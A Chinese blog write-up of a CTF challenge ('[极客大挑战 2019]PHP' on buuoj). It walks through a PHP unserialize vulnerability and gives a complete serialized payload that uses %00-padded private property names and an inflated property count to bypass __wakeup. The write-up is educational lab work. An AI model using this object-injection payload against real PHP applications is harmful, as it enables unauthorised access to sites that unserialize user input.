审计练习2——[极客大挑战 2019]PHP

于 2020-05-26 14:37:12 发布
阅读量207 收藏
点赞数 1
分类专栏: 代码审计 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/106354091
版权

平台:buuoj.cn
打开靶机挨打(卡爆了)
在这里插入图片描述
提示了有备份网站,尝试请求www.zip,成功得到源码。
解压得如下文件:
在这里插入图片描述
随便点点,flag.php自然是没有flag的,在index.php中只有一段:

    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

包含了class.php文件,get传入一个select参数再将其反序列化。那么考点可能就是php的反序列化漏洞
来看class.php:

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';//声明两个私有变量

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;//初始化
    }

    function __wakeup(){//反序列化时调用
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{//满足两个if得到flag
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

由此我们得知解题的条件:传入一个序列化的字符串,如果字符串经过反序列化之后username=admin,password=100,便会打印出flag。
那么构造序列化字符串。

<?php 
class Name{
        private $username = 'nonono';
        private $password = 'yesyes';

        public function __construct($username,$password){
                $this->username = $username;
                $this->password = $password; 
        }
}

$payload = new Name('admin',100);
echo serialize($payload);
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

到这再看看前面。
首先是第一个考点:

私有化声明,private是私有类型,该类型的属性或方法只能在该类中使用,在该类的实例、子类中、子类的实例中都不能调用私有类型的属性和方法。

私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀(ASCII 码为 0 的字符(不可见字符))。字符串长度也包括所加前缀的长度。
也就是说usrname和password前面是有一个\0的,但是复制的时候会丢失,因此我们需要加上%00填补上去

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

然后我们注意到,在执行__destruct得到flag之前,还会有一个__wakeup函数会在字符串反序列化执行之前把username重新赋值为guest,所以我们需要跳过它。
这里考察了一个php的漏洞:php-bugs-72663
反序列化时,如果反序列化字符串中表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
所以这里我们把name属性的个数在字符串中改一下就行

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

将最终的payload传入file得到flag
在这里插入图片描述
为啥我这么卡??难道说我的渣渣电脑已经不配打ctf了吗

hui________
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值